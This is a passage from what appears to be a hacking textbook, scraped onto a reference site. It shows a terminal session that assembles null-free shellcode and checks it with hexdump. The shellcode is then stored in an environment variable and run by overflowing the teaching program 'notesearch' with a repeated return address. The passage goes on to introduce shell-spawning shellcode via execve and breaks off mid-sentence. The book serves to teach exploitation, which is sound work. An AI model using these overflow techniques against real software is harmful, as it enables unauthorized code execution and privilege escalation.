Graphics Programs Reference
In-Depth Information
After assembling this shellcode, hexdump and grep are used to quickly
check it for null bytes.
reader@hacking:~/booksrc $ nasm helloworld3.s
reader@hacking:~/booksrc $ hexdump -C helloworld3 | grep --color=auto 00
00000000 eb 13 59 31 c0 b0 04 31 db 43 31 d2 b2 0f cd 80 |..Y1...1.C1.....|
00000010 b0 01 4b cd 80 e8 e8 ff ff ff 48 65 6c 6c 6f 2c |..K.......Hello,|
00000020 20 77 6f 72 6c 64 21 0a 0d | world!..|
00000029
reader@hacking:~/booksrc $
Now this shellcode is usable, as it doesn't contain any null bytes. When
used with an exploit, the notesearch program is coerced into greeting the
world like a newbie.
reader@hacking:~/booksrc $ export SHELLCODE=$(cat helloworld3)
reader@hacking:~/booksrc $ ./getenvaddr SHELLCODE ./notesearch
SHELLCODE will be at 0xbffff9bc
reader@hacking:~/booksrc $ ./notesearch $(perl -e 'print "\xbc\xf9\xff\xbf"x40')
[DEBUG] found a 33 byte note for user id 999
-------[ end of note data ]-------
Hello, world!
reader@hacking :~/booksrc $
0x530
Shell-Spawning Shellcode
Now that you've learned how to make system calls and avoid null bytes, all
sorts of shellcodes can be constructed. To spawn a shell, we just need to make
a system call to execute the /bin/sh shell program. System call number 11,
execve()
, is similar to the C
execute()
function that we used in the previous
chapters.
EXECVE(2) Linux Programmer's Manual EXECVE(2)
NAME
execve - execute program
SYNOPSIS
#include <unistd.h>
int execve(const char *filename, char *const argv[],
char *const envp[]);
DESCRIPTION
execve() executes the program pointed to by filename. Filename must be
either a binary executable, or a script starting with a line of the
form "#! interpreter [arg]". In the latter case, the interpreter must
be a valid pathname for an executable which is not itself a script,
which will be invoked as interpreter [arg] filename.
argv is an array of argument strings passed to the new program. envp
is an array of strings, conventionally of the form key=value, which are
